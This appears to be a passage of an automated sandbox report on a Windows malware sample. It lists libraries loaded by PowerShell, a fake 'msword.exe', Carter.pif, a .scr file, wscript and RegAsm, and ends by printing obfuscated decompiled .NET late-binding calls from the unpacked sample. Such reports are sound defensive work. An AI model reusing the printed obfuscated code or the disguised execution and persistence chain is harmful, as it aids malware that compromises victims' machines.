              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: shfolder.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: riched20.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: usp10.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: msls31.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: textinputframework.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: coreuicomponents.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: coremessaging.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: coremessaging.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: textshaping.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: edputil.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: appresolver.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: bcp47langs.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: slc.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: sppc.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: napinsp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: pnrpnsp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: wshbth.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: nlaapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: winrnr.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: rasadhlp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: aclayers.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: sfc.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: sfc_os.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: wbemcomn.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: avicap32.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: msvfw32.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000029.00000000.3291795440.0000000000C72000.00000002.00000001.01000000.00000012.sdmp
              Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000029.00000000.3291795440.0000000000C72000.00000002.00000001.01000000.00000012.sdmp

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_1hDllwdT4WVgtLtvrh9HNTiswVDrK.eJw816nOtBnQZuwusfPwdeCqpzSPc,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._6VCrJCYx9STcmgqNj8H9Kfg3sUAts,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._4JfBy5iKF4dHKJv3wpolEJW2Kc5aN,_1hDllwdT4WVgtLtvrh9HNTiswVDrK.fUOnaw45vUZW9wRtPzKDoSUr7wQOr,GKj04XVvJiEzT5.o4DomEaaAK3Tvn()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2],GKj04XVvJiEzT5.HW4WcRdB9jpgvy(GKj04XVvJiEzT5.LnW574bP2vfKev(B7gC3ws7qAtINRZuxsMLlEJhLdYgq[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_1hDllwdT4WVgtLtvrh9HNTiswVDrK.eJw816nOtBnQZuwusfPwdeCqpzSPc,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._6VCrJCYx9STcmgqNj8H9Kfg3sUAts,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._4JfBy5iKF4dHKJv3wpolEJW2Kc5aN,_1hDllwdT4WVgtLtvrh9HNTiswVDrK.fUOnaw45vUZW9wRtPzKDoSUr7wQOr,GKj04XVvJiEzT5.o4DomEaaAK3Tvn()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2],GKj04XVvJiEzT5.HW4WcRdB9jpgvy(GKj04XVvJiEzT5.LnW574bP2vfKev(B7gC3ws7qAtINRZuxsMLlEJhLdYgq[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2] }}, (string[])null, (Type[])null, (bool[])null, true)
